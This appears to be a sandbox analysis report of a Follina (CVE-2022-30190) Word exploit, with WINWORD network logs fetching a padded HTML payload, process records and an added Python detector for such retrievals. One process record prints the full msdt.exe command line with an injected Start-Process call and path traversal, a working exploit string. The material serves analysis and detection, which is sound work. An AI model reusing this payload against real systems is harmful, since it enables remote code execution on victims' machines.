Timestamp | kBytes transferred | Direction | Data
2022-08-18 00:01:55 UTC | 0 | OUT | HEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: sqdocs.s3.eu-west-2.amazonaws.com
2022-08-18 00:01:55 UTC | 1 | IN | HTTP/1.1 400 Bad Request
x-amz-request-id: 5QCM3ZBPJHNQ6B31
x-amz-id-2: wtiPXNw4psoYP4KoBz6ow5DVioPCQ46oSnVxP60MDdTYuSqybn84v0cj+Si6gaOPMWJ9xiZxuVg=
Content-Type: application/xml
Date: Thu, 18 Aug 2022 00:01:54 GMT
Server: AmazonS3
Connection: close


Session ID: 10 | Source IP: 192.168.2.3 | Source Port: 49756 | Destination IP: 52.95.143.42 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 00:02:00 UTC | 13 | OUT | HEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
    Authorization: Bearer
    X-MS-CookieUri-Requested: t
    X-IDCRL_ACCEPTED: t
    User-Agent: Microsoft Office Existence Discovery
    Host: sqdocs.s3.eu-west-2.amazonaws.com
    Connection: Keep-Alive
2022-08-18 00:02:00 UTC | 14 | IN | HTTP/1.1 400 Bad Request
    x-amz-request-id: TT1GGMJ3NHTMGSNX
    x-amz-id-2: PEKOO5iCwgLvYsjguB+ANO/Z+QSv0crGg59ZOj0Ckf4T62fGrzdprUXMazqepsOk6BkvbbLCUGU=
    Content-Type: application/xml
    Date: Thu, 18 Aug 2022 00:02:00 GMT
    Server: AmazonS3
    Connection: close


Session ID: 11 | Source IP: 192.168.2.3 | Source Port: 49757 | Destination IP: 52.95.143.42 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 00:02:01 UTC | 14 | OUT | HEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
    Authorization: Bearer
    X-MS-CookieUri-Requested: t
    X-IDCRL_ACCEPTED: t
    User-Agent: Microsoft Office Existence Discovery
    Host: sqdocs.s3.eu-west-2.amazonaws.com
    Connection: Keep-Alive
2022-08-18 00:02:01 UTC | 14 | IN | HTTP/1.1 400 Bad Request
    x-amz-request-id: ZEV4D8MZA5ZJ1FHD
    x-amz-id-2: RSj/NtHjlgcSHIRWyNZtlYtZa9qD5+TMgLl6wB82hV9HgTFE60ogFpZtMa9Q1lC2QmFuvh3mJ58=
    Content-Type: application/xml
    Date: Thu, 18 Aug 2022 00:02:00 GMT
    Server: AmazonS3
    Connection: close


Session ID: 12 | Source IP: 192.168.2.3 | Source Port: 49758 | Destination IP: 52.95.143.42 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 00:02:06 UTC | 14 | OUT | HEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
    Authorization: Bearer
    X-MS-CookieUri-Requested: t
    X-IDCRL_ACCEPTED: t
    User-Agent: Microsoft Office Existence Discovery
    Host: sqdocs.s3.eu-west-2.amazonaws.com
    Connection: Keep-Alive
2022-08-18 00:02:06 UTC | 15 | IN | HTTP/1.1 400 Bad Request
    x-amz-request-id: E80VWEB1AMKYZNWY
    x-amz-id-2: 0BWYhlFey3+aAE1qOD1AP1Q71QTNRlWpvY+uCIz3wJAD9HRMzfwi90X1DnI3V9df0Rdee1ttGrU=
    Content-Type: application/xml
    Date: Thu, 18 Aug 2022 00:02:06 GMT
    Server: AmazonS3
    Connection: close


Session ID: 2 | Source IP: 192.168.2.3 | Source Port: 49748 | Destination IP: 52.95.148.198 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 00:01:58 UTC | 1 | OUT | OPTIONS / HTTP/1.1
    Connection: Keep-Alive
    Authorization: Bearer
    User-Agent: Microsoft Office Word 2014
    X-Office-Major-Version: 16
    X-MS-CookieUri-Requested: t
    X-FeatureVersion: 1
    X-MSGETWEBURL: t
    X-IDCRL_ACCEPTED: t
    Host: sqdocs.s3.eu-west-2.amazonaws.com
2022-08-18 00:01:58 UTC | 1 | IN | HTTP/1.1 400 Bad Request
    x-amz-request-id: P3EWWM72G2RM0XJE
    x-amz-id-2: FSmMv6eeU+h8DR13qzhvThGDOugjSr6g4c5sbuke10CmSf9fNRwf0Ox1ENuctW3LSoV71PkJaoU=
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Date: Thu, 18 Aug 2022 00:01:58 GMT
    Server: AmazonS3
    Connection: close
2022-08-18 00:01:58 UTC | 1 | IN | Data Raw: 31 31 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 49 6e 73 75 66 66 69 63 69 65 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 4f 72 69 67 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 20 6e 65 65 64 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 50 33 45 57 57 4d 37 32 47 32 52 4d 30 58 4a 45 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 46 53 6d 4d 76 36 65 65 55 2b 68 38 44 52 31 33 71 7a 68 76 54 68 47 44 4f 75 67 6a 53 72 36 67 34 63 35 73 62 75 6b 65 31 30 43 6d 53 66 39 66 4e 52 77 66 30 4f 78 31 45 4e 75 63
    Data Ascii: 11b<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>P3EWWM72G2RM0XJE</RequestId><HostId>FSmMv6eeU+h8DR13qzhvThGDOugjSr6g4c5sbuke10CmSf9fNRwf0Ox1ENuc
2022-08-18 00:01:58 UTC | 2 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 3 | Source IP: 192.168.2.3 | Source Port: 49749 | Destination IP: 52.95.143.42 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 00:01:59 UTC | 2 | OUT | GET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
    Accept-Encoding: gzip, deflate
    Host: sqdocs.s3.eu-west-2.amazonaws.com
    Connection: Keep-Alive
2022-08-18 00:01:59 UTC | 2 | IN | HTTP/1.1 200 OK
    x-amz-id-2: oIIlUHss3ir8tXxf8vsNAqhVGr5rfrX6iPExtJuwA/pkcrBb+WlpUvSUT6k/tMAZT0eW6cU8uWE=
    x-amz-request-id: DVY02PZCBKMPRJGM
    Date: Thu, 18 Aug 2022 00:02:00 GMT
    Last-Modified: Sat, 28 May 2022 14:15:08 GMT
    ETag: "bfbfa8fdda62476690c9077946372eaa"
    x-amz-meta-sha256: a353db4cfd64f1876f3f99be6481189dbf5e770d71b8d03cba84ff551edbcdc6
    x-amz-meta-s3b-last-modified: 20220528T141455Z
    Accept-Ranges: bytes
    Content-Type: text/html
    Server: AmazonS3
    Content-Length: 6837
    Connection: close
2022-08-18 00:01:59 UTC | 3 | IN | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    Data Ascii: <!doctype html><html lang="en"><body><script>//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

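Sessions 2 through 6 above are the retrieval half of the Follina chain as it looks on the wire: WINWORD.EXE first probes the linked resource with the "Microsoft Office Existence Discovery" user agent, then fetches it with an MSIE/ms-office user agent, and the 200 OK body is a text/html document whose <script> block opens with long comment padding (public Follina proofs of concept pad the HTML this way so it reaches several kilobytes). The Python below is an added example, not part of the Joe Sandbox report or its tooling, that triages session records of this shape for that pattern. The sample sessions are constructed from the values visible in the report (host, path, user agents, status codes, Content-Length) with a shortened body; the first-party host suffix list, the padding threshold and the benign contrast session are assumptions for the example.

```python
"""Triage Office-originated HTTP(S) sessions for Follina-style retrieval of an
external, padded HTML payload. Added example, not part of the sandbox report;
sample sessions are constructed from values shown in the report."""
import re
from dataclasses import dataclass, field

# Processes whose outbound web fetches deserve scrutiny (assumption: the
# Office binaries; extend for the environment being monitored).
OFFICE_PROCESSES = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}

# Hosts Office contacts in normal operation. This suffix list is an assumption
# for the example, not an authoritative Microsoft list.
FIRST_PARTY_SUFFIXES = (".microsoft.com", ".office.com", ".office.net",
                        ".live.com", ".msocdn.com")

# User agent Office uses when checking whether a linked resource exists.
EXISTENCE_PROBE_UA = "Microsoft Office Existence Discovery"

# Public Follina PoCs pad the HTML with comment lines of one repeated character
# so the document grows past a few kilobytes; match such a run inside a comment.
PADDING_RE = re.compile(r"//(.)\1{40,}")
MIN_PADDED_SIZE = 4096  # assumed threshold for "padded" documents


@dataclass
class Session:
    session_id: int
    process: str          # full image path, as the report prints it
    host: str
    method: str
    path: str
    user_agent: str
    status: int
    content_type: str = ""
    content_length: int = 0
    body: bytes = b""     # may be truncated, as in the report


@dataclass
class Finding:
    host: str
    process: str
    session_ids: list = field(default_factory=list)
    reasons: list = field(default_factory=list)


def is_external(host: str) -> bool:
    """True unless the host sits under one of the first-party suffixes."""
    return not host.lower().endswith(FIRST_PARTY_SUFFIXES)


def looks_like_padded_html(s: Session) -> bool:
    """200 text/html whose script body carries comment padding and whose
    declared (or observed) size clears the padding threshold."""
    if s.status != 200 or not s.content_type.lower().startswith("text/html"):
        return False
    text = s.body.decode("utf-8", "replace")
    size = max(s.content_length, len(s.body))
    return ("<script" in text.lower()
            and PADDING_RE.search(text) is not None
            and size >= MIN_PADDED_SIZE)


def triage(sessions):
    """Group sessions by destination host; emit one Finding per host from
    which an Office process fetched an external, padded HTML document."""
    by_host = {}
    for s in sessions:
        by_host.setdefault(s.host, []).append(s)

    findings = []
    for host, group in by_host.items():
        image = group[0].process.rsplit("\\", 1)[-1].upper()
        if image not in OFFICE_PROCESSES:
            continue
        reasons = []
        if is_external(host):
            reasons.append("office_process_external_host")
        if any(s.user_agent == EXISTENCE_PROBE_UA for s in group):
            reasons.append("existence_discovery_probe")
        if any(s.method == "GET" and s.user_agent.startswith("Mozilla/") for s in group):
            reasons.append("browser_ua_get_from_office")
        if any(looks_like_padded_html(s) for s in group):
            reasons.append("padded_html_payload")
        # The padded payload is the decisive indicator; probes and browser-UA
        # GETs alone also occur for legitimate linked content.
        if "padded_html_payload" in reasons and "office_process_external_host" in reasons:
            findings.append(Finding(host, group[0].process,
                                    sorted(s.session_id for s in group), reasons))
    return findings


# Constructed sample, modelled on sessions 2, 3 and 4 of the report.
WINWORD = r"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE"
HOST = "sqdocs.s3.eu-west-2.amazonaws.com"
PATH = "/fb0f9c45-fb5f-4690-9815-e11a762d4739.html"
MSIE_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; "
           "Trident/7.0; ms-office; MSOffice 16)")
# Same prologue as the report's Data Ascii; two padding lines stand in for
# the rest of the 6837-byte document (body is constructed and shortened).
PAYLOAD_HEAD = (b'<!doctype html>\r\n<html lang="en">\r\n<body>\r\n<script>\r\n'
                + (b"//" + b"A" * 100 + b"\r\n") * 2)
SAMPLE_SESSIONS = [
    Session(2, WINWORD, HOST, "OPTIONS", "/", "Microsoft Office Word 2014", 400,
            "application/xml"),
    Session(3, WINWORD, HOST, "GET", PATH, MSIE_UA, 200, "text/html", 6837, PAYLOAD_HEAD),
    Session(4, WINWORD, HOST, "HEAD", PATH, EXISTENCE_PROBE_UA, 400, "application/xml"),
    # Hypothetical benign contrast session; host and path are constructed.
    Session(99, WINWORD, "roaming.example.office.com", "GET", "/settings",
            "Microsoft Office Word 2014", 200, "application/json", 120, b"{}"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_SESSIONS):
        print(f"{f.host} sessions={f.session_ids} reasons={f.reasons}")
```

Run against the constructed sample it reports one host, sqdocs.s3.eu-west-2.amazonaws.com, with all four reasons; the benign contrast session produces nothing. When feeding real sandbox output, keep the declared Content-Length, because the report truncates bodies and the padding check would otherwise under-count.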

Session ID: 4 | Source IP: 192.168.2.3 | Source Port: 49750 | Destination IP: 52.95.143.42 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 00:01:59 UTC | 9 | OUT | HEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
    Authorization: Bearer
    X-MS-CookieUri-Requested: t
    X-IDCRL_ACCEPTED: t
    User-Agent: Microsoft Office Existence Discovery
    Host: sqdocs.s3.eu-west-2.amazonaws.com
    Connection: Keep-Alive
2022-08-18 00:01:59 UTC | 9 | IN | HTTP/1.1 400 Bad Request
    x-amz-request-id: DVYEP8YWXYYRJGDD
    x-amz-id-2: VYJt91aw1V3E4W8U3qXrpbSZrLUVLylL13dvNUN38v+OEh8jOUOwsHzvv27P4K+dKntcKUMoaSI=
    Content-Type: application/xml
    Date: Thu, 18 Aug 2022 00:01:58 GMT
    Server: AmazonS3
    Connection: close


Session ID: 5 | Source IP: 192.168.2.3 | Source Port: 49751 | Destination IP: 52.95.143.42 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 00:01:59 UTC | 10 | OUT | HEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
    Authorization: Bearer
    X-MS-CookieUri-Requested: t
    X-IDCRL_ACCEPTED: t
    User-Agent: Microsoft Office Existence Discovery
    Host: sqdocs.s3.eu-west-2.amazonaws.com
    Connection: Keep-Alive
2022-08-18 00:01:59 UTC | 10 | IN | HTTP/1.1 400 Bad Request
    x-amz-request-id: DVY7HCV5RENAHVH8
    x-amz-id-2: g/KPSGiVVku+Xca8F/YxRjPHUcOieN73SfrITqvyYYysP3mG1+zuqAyuv0PlZcUcIlN9rbs3kAQ=
    Content-Type: application/xml
    Date: Thu, 18 Aug 2022 00:01:59 GMT
    Server: AmazonS3
    Connection: close


Session ID: 6 | Source IP: 192.168.2.3 | Source Port: 49752 | Destination IP: 52.95.148.198 | Destination Port: 443 | Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 00:01:59 UTC | 10 | OUT | OPTIONS / HTTP/1.1
    Connection: Keep-Alive
    Authorization: Bearer
    User-Agent: Microsoft Office Word 2014
    X-Office-Major-Version: 16
    X-MS-CookieUri-Requested: t
    X-FeatureVersion: 1
    X-MSGETWEBURL: t
    X-IDCRL_ACCEPTED: t
    Host: sqdocs.s3.eu-west-2.amazonaws.com
2022-08-18 00:01:59 UTC | 10 | IN | HTTP/1.1 400 Bad Request
    x-amz-request-id: DVYDAKDP59Z8PVGG
    x-amz-id-2: EIe0HGdzKwBEML3ypybGWTNQ+cpf1ClQQUHTXbhxcnRABQ5OBUT3HJHAiONTlNqfv8VQ+yxXOeg=
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Date: Thu, 18 Aug 2022 00:01:59 GMT
    Server: AmazonS3
    Connection: close
2022-08-18 00:01:59 UTC | 11 | IN | Data Raw: 31 31 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 49 6e 73 75 66 66 69 63 69 65 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 4f 72 69 67 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 20 6e 65 65 64 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 44 56 59 44 41 4b 44 50 35 39 5a 38 50 56 47 47 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 45 49 65 30 48 47 64 7a 4b 77 42 45 4d 4c 33 79 70 79 62 47 57 54 4e 51 2b 63 70 66 31 43 6c 51 51 55 48 54 58 62 68 78 63 6e 52 41 42 51 35 4f 42 55 54 33 48 4a 48 41 69 4f 4e 54
                                                                                                                                                                  Data Ascii: 11b<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>DVYDAKDP59Z8PVGG</RequestId><HostId>EIe0HGdzKwBEML3ypybGWTNQ+cpf1ClQQUHTXbhxcnRABQ5OBUT3HJHAiONT
                                                                                                                                                                  2022-08-18 00:01:59 UTC11INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


Session ID: 7
Source IP: 192.168.2.3    Source Port: 49753
Destination IP: 52.95.148.198    Destination Port: 443
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-08-18 00:02:00 UTC    kBytes transferred: 11    Direction: OUT
HEAD /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: sqdocs.s3.eu-west-2.amazonaws.com

Timestamp: 2022-08-18 00:02:00 UTC    kBytes transferred: 11    Direction: IN
HTTP/1.1 400 Bad Request
x-amz-request-id: TT1Z4E5N21WDAFC2
x-amz-id-2: Zor3MEpGnxC9gYmTOwYVz+AmopmYVikfOHvxxHtHbdqyFBCddeWrr6hmm2ojwz46N4EVPqvZFTc=
Content-Type: application/xml
Date: Thu, 18 Aug 2022 00:01:59 GMT
Server: AmazonS3
Connection: close


Session ID: 8
Source IP: 192.168.2.3    Source Port: 49754
Destination IP: 52.95.148.198    Destination Port: 443
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-08-18 00:02:00 UTC    kBytes transferred: 12    Direction: OUT
OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: sqdocs.s3.eu-west-2.amazonaws.com

Timestamp: 2022-08-18 00:02:00 UTC    kBytes transferred: 12    Direction: IN
HTTP/1.1 400 Bad Request
x-amz-request-id: TT1N82C4P0D0A3P4
x-amz-id-2: ao+D3hUOwmABsSSm8/wGU5aD9/3JSnnmdm3IVV7aJaQuNPlvwm+pTqB9lbLa72I5K4lPvGdjtKw=
Content-Type: application/xml
Transfer-Encoding: chunked
Date: Thu, 18 Aug 2022 00:01:59 GMT
Server: AmazonS3
Connection: close

Timestamp: 2022-08-18 00:02:00 UTC    kBytes transferred: 12    Direction: IN
Data Raw: 31 31 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 49 6e 73 75 66 66 69 63 69 65 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 4f 72 69 67 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 20 6e 65 65 64 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 54 54 31 4e 38 32 43 34 50 30 44 30 41 33 50 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 61 6f 2b 44 33 68 55 4f 77 6d 41 42 73 53 53 6d 38 2f 77 47 55 35 61 44 39 2f 33 4a 53 6e 6e 6d 64 6d 33 49 56 56 37 61 4a 61 51 75 4e 50 6c 76 77 6d 2b 70 54 71 42 39 6c 62 4c 61
Data Ascii: 11b<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>TT1N82C4P0D0A3P4</RequestId><HostId>ao+D3hUOwmABsSSm8/wGU5aD9/3JSnnmdm3IVV7aJaQuNPlvwm+pTqB9lbLa

Timestamp: 2022-08-18 00:02:00 UTC    kBytes transferred: 12    Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 9
Source IP: 192.168.2.3    Source Port: 49755
Destination IP: 52.95.143.42    Destination Port: 443
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-08-18 00:02:00 UTC    kBytes transferred: 12    Direction: OUT
GET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: sqdocs.s3.eu-west-2.amazonaws.com
If-Modified-Since: Sat, 28 May 2022 14:15:08 GMT
If-None-Match: "bfbfa8fdda62476690c9077946372eaa"
Connection: Keep-Alive

Timestamp: 2022-08-18 00:02:00 UTC    kBytes transferred: 13    Direction: IN
HTTP/1.1 304 Not Modified
x-amz-id-2: 4nyJpwpshGYJkfa/Q8R4P0obj9SVcObicHGOxWSGjArM6TL1m9oGXvYv5wPV2p+Dq1H39dRdiM0=
x-amz-request-id: TT1Q1P16PR7R77W1
Date: Thu, 18 Aug 2022 00:02:01 GMT
Last-Modified: Sat, 28 May 2022 14:15:08 GMT
ETag: "bfbfa8fdda62476690c9077946372eaa"
x-amz-meta-sha256: a353db4cfd64f1876f3f99be6481189dbf5e770d71b8d03cba84ff551edbcdc6
x-amz-meta-s3b-last-modified: 20220528T141455Z
Server: AmazonS3
Connection: close



Target ID: 0
Start time: 02:01:46
Start date: 18/08/2022
Path: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase: 0x120000
File size: 1937688 bytes
MD5 hash: 0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 5
Start time: 02:01:55
Start date: 18/08/2022
Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Wow64 process (32bit): true
Commandline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Imagebase: 0xe10000
File size: 466688 bytes
MD5 hash: EA19F4A0D18162BE3A0C8DAD249ADE8C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 12
Start time: 02:02:05
Start date: 18/08/2022
Path: C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
Imagebase: 0xbe0000
File size: 1508352 bytes
MD5 hash: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000C.00000002.568294017.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000C.00000002.568294017.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000C.00000002.559095546.0000000000718000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000C.00000002.558367025.0000000000520000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000C.00000002.558367025.0000000000520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000C.00000002.558856728.0000000000710000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000C.00000002.558856728.0000000000710000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate

Target ID: 22
Start time: 02:03:03
Start date: 18/08/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5pliokiz\5pliokiz.cmdline
Imagebase: 0x150000
File size: 2170976 bytes
MD5 hash: 350C52F71BDED7B99668585C15D70EEA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: moderate

Target ID: 24
Start time: 02:03:05
Start date: 18/08/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES329A.tmp" "c:\Users\user\AppData\Local\Temp\5pliokiz\CSCEC77468AE1504898A4CAD2F9B69D7F46.TMP"
Imagebase: 0x890000
File size: 43176 bytes
MD5 hash: C09985AE74F0882F208D75DE27770DFA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 25
                                                                                                                                                                  Start time:02:03:09
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h34ip5a5\h34ip5a5.cmdline
                                                                                                                                                                  Imagebase:0x150000
                                                                                                                                                                  File size:2170976 bytes
                                                                                                                                                                  MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
